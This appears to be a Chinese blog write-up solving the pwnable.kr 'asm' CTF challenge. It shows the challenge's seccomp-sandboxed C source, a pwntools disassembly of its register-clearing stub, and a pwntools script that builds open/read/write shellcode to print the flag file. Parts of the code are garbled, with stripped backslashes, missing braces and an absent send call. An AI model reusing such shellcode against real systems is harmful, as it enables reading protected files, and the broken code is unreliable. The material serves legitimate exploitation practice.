大概意思就是连接到9026端口 asm再特权下执行并get flag
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
#define LENGTH 128
void sandbox(){
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
if (ctx == NULL) {
printf("seccomp errorn");
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
if (seccomp_load(ctx) < 0){
printf("seccomp errorn");
char stub[] = "x48x31xc0x48x31xdbx48x31xc9x48x31xd2x48x31xf6x48x31xffx48x31xedx4dx31xc0x4dx31xc9x4dx31xd2x4dx31xdbx4dx31xe4x4dx31xedx4dx31xf6x4dx31xff";
unsigned char filter[256];
int main(int argc, char* argv[]){
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stdin, 0, _IOLBF, 0);
printf("Welcome to shellcoding practice challenge.n");
printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.n");
printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.n");
printf("If this does not challenge you. you should play 'asg' challenge :)n");
char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
memset(sh, 0x90, 0x1000);
memcpy(sh, stub, strlen(stub));
int offset = sizeof(stub);
printf("give me your x64 shellcode: ");
read(0, sh+offset, 1000);
chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp
((void (*)(void))sh)();
return 0;
1.读取我们的输入 建立一个可以执行的缓冲区,将stub拷入内存,并且提示
在此挑战中,您可以在SECCOMP沙箱下运行x64 shellcode
尝试制作仅使用open()/ read()/ write()系统调用输出标志的shellcode
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stdin, 0, _IOLBF, 0);
printf("Welcome to shellcoding practice challenge.n");
printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.n");
printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.n");
printf("If this does not challenge you. you should play 'asg' challenge :)n");
char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
memset(sh, 0x90, 0x1000);
memcpy(sh, stub, strlen(stub));
int offset = sizeof(stub);
printf("give me your x64 shellcode: ");
read(0, sh+offset, 1000);
chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp
((void (*)(void))sh)();
return 0;
我们来查看stub 中 的shellcode格式,运用pwntools查看
Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> print disasm("x48x31xc0x48x31xdbx48x31xc9x48x31xd2x48x31xf6x48x31xffx48x31xedx4dx31xc0x4dx31xc9x4dx31xd2x4dx31xdbx4dx31xe4x4dx31xedx4dx31xf6x4dx31xff")
0: 48 dec eax
1: 31 c0 xor eax, eax
3: 48 dec eax
4: 31 db xor ebx, ebx
6: 48 dec eax
7: 31 c9 xor ecx, ecx
9: 48 dec eax
a: 31 d2 xor edx, edx
c: 48 dec eax
d: 31 f6 xor esi, esi
f: 48 dec eax
10: 31 ff xor edi, edi
12: 48 dec eax
13: 31 ed xor ebp, ebp
15: 4d dec ebp
16: 31 c0 xor eax, eax
18: 4d dec ebp
19: 31 c9 xor ecx, ecx
1b: 4d dec ebp
1c: 31 d2 xor edx, edx
1e: 4d dec ebp
1f: 31 db xor ebx, ebx
21: 4d dec ebp
22: 31 e4 xor esp, esp
24: 4d dec ebp
25: 31 ed xor ebp, ebp
27: 4d dec ebp
28: 31 f6 xor esi, esi
2a: 4d dec ebp
2b: 31 ff xor edi, edi
分析一下这段shellcode 除了将寄存器清0并无其他特殊功能
既然知道了只能使用read,open,write,exit,exit_group 这些函数,这些函数其实只用来读取flag文件来说已经足够了。
from pwn import *
con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
r = con.connect_remote('localhost',9026)
shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp')
#读取内容到rsp rax是open的返回值
shellcode += shellcraft.read('rax','rsp',100)
shellcode += shellcraft.write(1,'rsp',100)
r.recvuntil('give me your x64 shellcode: ')
print r.recvall()
get flag ????
以上就是独特机器猫最近收集整理的关于pwnable.kr asm的全部内容,更多相关pwnable.kr内容请搜索靠谱客的其他文章。
发表评论 取消回复